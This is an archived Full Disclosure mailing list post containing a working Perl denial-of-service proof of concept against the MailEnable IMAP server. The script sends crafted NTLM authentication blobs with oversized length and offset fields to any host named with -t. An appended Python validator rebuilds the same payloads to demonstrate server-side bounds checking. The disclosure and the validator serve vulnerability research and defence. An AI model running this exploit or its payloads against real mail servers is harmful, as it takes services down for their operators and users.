Full Disclosure mailing list archives
MailEnable DoS POC-2
From: mu-b <mu-b () digit-labs org>
Date: Wed, 14 Feb 2007 17:43:31 +0000
This version will work on the latest MailEnable v2.37. Symantec seem to think this is the same issue as BID 20290, but it is in fact completely different... and somewhat unpatched.

---------------------------------------------------------------------------
(mu-b () digit-labs org)
#!/usr/bin/perl
#
# maildisable-v7.pl
#
# Mail Enable Professional/Enterprise v2.32-7 (win32)
# by mu-b - Wed Feb 14 2007
#
# - Tested on: Mail Enable Professional v2.37 (win32)
#
########

use Getopt::Std;
getopts('t:', \%arg);
use Socket;
use MIME::Base64;

&print_header;

my $target;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;
my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");

    # Open an IMAP NTLM SASL exchange; the crafted blobs below are sent
    # base64-encoded, one per continuation line, as the server expects.
    send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
    sleep($send_delay);

    # First blob: 12 bytes of padding, the dword 0xfffffffa, 12 more bytes of padding.
    $buf = ($PAD x 12). "\xfa\xff\xff\xff". ($PAD x 12);
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    # Second blob: 28 bytes of padding, then 0x0100, two padding bytes and
    # the dword 0x7fffffff at byte 28.
    $buf = ($PAD x 28). "\x00\x01". ($PAD x 2). "\xff\xff\xff\x7f";
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("MailEnable Pro v2.37 DoS POC\n");
    print("by: <mu-b\@digit-labs.org>\n\n");
}

sub usage {
    print(qq(Usage: $0 -t <hostname>

    -t <hostname>    : hostname to test
));
    exit(1);
}

# Plain blocking TCP connect to $target:$port on the global SOCKET handle.
sub connect_host {
    ($target, $port) = @_;

    $iaddr = inet_aton($target) || die("Error: $!\n");
    $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr) || die("Error: $!\n");

    return(1338);
}
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
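The PoC above hands the IMAP server two NTLM blobs whose bytes do not even begin with the NTLMSSP signature and which carry very large values where the length and offset fields of NTLM security buffers sit. The check below is an added example, not mu-b's code and not MailEnable's, of the server-side validation that should sit in front of any NTLM parser: strict base64 decoding of the continuation line, signature and type check, then a bounds check of every (len, maxlen, offset) security buffer against the size of the blob actually received. It assumes the public NTLMSSP layout (8-byte signature, little-endian u32 type, fixed buffer positions for Type 1 and Type 3) and is simplified: Type 2 and the optional Type 3 session-key buffer are not handled. The two PoC blobs are rebuilt byte for byte; the "constructed" variants place the same oversized field values behind a valid header so that the bounds check, not the signature check, is what rejects them.

```python
"""Strict sanity check for NTLM blobs on an IMAP AUTHENTICATE NTLM exchange.
Added example; assumes the public NTLMSSP message layout."""
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"

# Byte position of each 8-byte security buffer header (u16 len, u16 maxlen,
# u32 offset) inside the message, per message type.
SECURITY_BUFFERS = {
    1: {"domain": 16, "workstation": 24},
    3: {"lm_response": 12, "nt_response": 20, "domain": 28,
        "user": 36, "workstation": 44},
}


def check_ntlm_message(msg):
    """Return (ok, reason). ok is True only if the header is sane and every
    security buffer lies entirely inside msg."""
    if len(msg) < 12:
        return False, "too short for signature and type"
    if msg[:8] != NTLMSSP_SIGNATURE:
        return False, "bad NTLMSSP signature"
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type not in SECURITY_BUFFERS:
        return False, "unsupported message type %d" % msg_type
    for name, pos in SECURITY_BUFFERS[msg_type].items():
        if pos + 8 > len(msg):
            return False, "%s buffer header truncated" % name
        length, maxlen, offset = struct.unpack_from("<HHI", msg, pos)
        if maxlen < length:
            return False, "%s buffer maxlen smaller than len" % name
        # Written as length > len(msg) - offset rather than offset + length
        # > len(msg) so a C port of the same check cannot wrap on a huge offset.
        if offset > len(msg) or length > len(msg) - offset:
            return False, "%s buffer out of bounds (len=%d, off=%d, msg=%d)" % (
                name, length, offset, len(msg))
    return True, "ok"


def check_imap_authenticate_line(line):
    """Validate one client continuation line: strip CR/LF, decode base64
    strictly, then check the NTLM blob."""
    try:
        blob = base64.b64decode(line.strip(), validate=True)
    except (ValueError, TypeError):
        return False, "line is not valid base64"
    return check_ntlm_message(blob)


def wire_line(blob):
    """What the PoC puts on the wire for a blob (base64 plus line ending)."""
    return base64.b64encode(blob) + b"\r\n"


def poc_payloads():
    """The two blobs maildisable-v7.pl sends, rebuilt byte for byte."""
    pad = b"A"
    first = pad * 12 + b"\xfa\xff\xff\xff" + pad * 12
    second = pad * 28 + b"\x00\x01" + pad * 2 + b"\xff\xff\xff\x7f"
    return first, second


def ntlm_header(msg_type):
    return NTLMSSP_SIGNATURE + struct.pack("<I", msg_type)


def constructed_bad_type1():
    """Constructed: valid Type 1 header followed by the first PoC blob's bytes
    from offset 12 on, so the domain buffer reads len=0x4141, off=0x41414141."""
    return ntlm_header(1) + b"\xfa\xff\xff\xff" + b"A" * 16


def constructed_bad_type3():
    """Constructed: valid Type 3 header, empty LM/NT buffers, and the second
    PoC blob's len=0x0100 / off=0x7fffffff domain buffer at byte 28."""
    return (ntlm_header(3) + b"\x00" * 16
            + b"\x00\x01" + b"AA" + b"\xff\xff\xff\x7f"
            + b"\x00" * 16)


def constructed_good_type1():
    """Constructed well-formed Type 1 carrying a 5-byte domain at offset 32."""
    flags = b"\x07\x82\x08\xa2"  # arbitrary negotiate flags (assumption)
    domain = b"DIGIT"
    body_offset = 32
    return (ntlm_header(1) + flags
            + struct.pack("<HHI", len(domain), len(domain), body_offset)
            + struct.pack("<HHI", 0, 0, body_offset + len(domain))
            + domain)


if __name__ == "__main__":
    first, second = poc_payloads()
    for label, blob in [("PoC blob 1 (as sent)", first),
                        ("PoC blob 2 (as sent)", second),
                        ("constructed bad Type 1", constructed_bad_type1()),
                        ("constructed bad Type 3", constructed_bad_type3()),
                        ("constructed good Type 1", constructed_good_type1())]:
        print("%-24s -> %s" % (label, check_imap_authenticate_line(wire_line(blob))))
```

Run as-is it reports the two PoC lines rejected on the signature check, the two constructed variants rejected on the buffer bounds check with the offending len/off values, and the well-formed Type 1 accepted. Note that MIME::Base64's encode_base64 appends its own newline before the PoC adds "\r\n"; the strip() before decoding is what keeps that from being a parse error on the server side.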